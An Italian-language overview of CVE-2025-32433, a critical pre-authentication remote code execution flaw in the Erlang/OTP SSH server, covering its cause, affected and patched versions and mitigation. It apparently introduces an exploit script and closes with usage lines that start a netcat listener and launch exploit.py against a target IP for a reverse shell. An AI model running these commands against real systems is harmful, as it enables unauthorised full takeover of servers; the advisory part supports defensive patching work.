
CVE-2025-32433 Riepilogo e Panoramica dell'Attacco
Sintesi e panoramica dell'attacco CVE-2025-32433
CVE-2025-32433 è una vulnerabilità critica di esecuzione remota di codice (RCE) non autenticata nel server SSH Erlang/OTP, divulgata il 16 aprile 2025. Erlang/OTP SSH è una libreria utilizzata in varie applicazioni distribuite e di telecomunicazione. Il difetto deriva dalla gestione impropria dei messaggi del protocollo SSH: il server non applica la normale sequenza di autenticazione, consentendo a un attaccante di inviare messaggi SSH appositamente costruiti prima dell'autenticazione. In questo modo, l'attaccante può iniettare ed eseguire codice Erlang arbitrario sul server nvd.nist.gov offsec.com . In termini pratici, ciò significa che un attaccante con accesso di rete a un server SSH Erlang/OTP vulnerabile (spesso eseguito come root) può attivare una reverse shell o eseguire comandi senza alcuna credenziale, portando alla compromissione totale del sistema nvd.nist.gov offsec.com . A questa vulnerabilità è assegnato un CVSS 10.0 (gravità massima) offsec.com .
Le versioni interessate sono tutte le release Erlang/OTP precedenti a OTP-27.3.3, OTP-26.2.5.11 o OTP-25.3.2.20 (le versioni corrette) nvd.nist.gov offsec.com . I sistemi interessati includono spesso server Linux o appliance che eseguono un demone SSH basato su Erlang (da non confondere con OpenSSH). È importante notare che i server OpenSSH predefiniti su Linux/BSD non sono vulnerabili offsec.com . Gli utenti dovrebbero considerare vulnerabile qualsiasi server SSH Erlang/OTP esposto e applicare immediatamente le patch ufficiali o disabilitare il servizio SSH.
L'attacco funziona avviando una connessione SSH e inviando poi una sequenza di messaggi SSH fuori ordine. :
uso:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
es:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555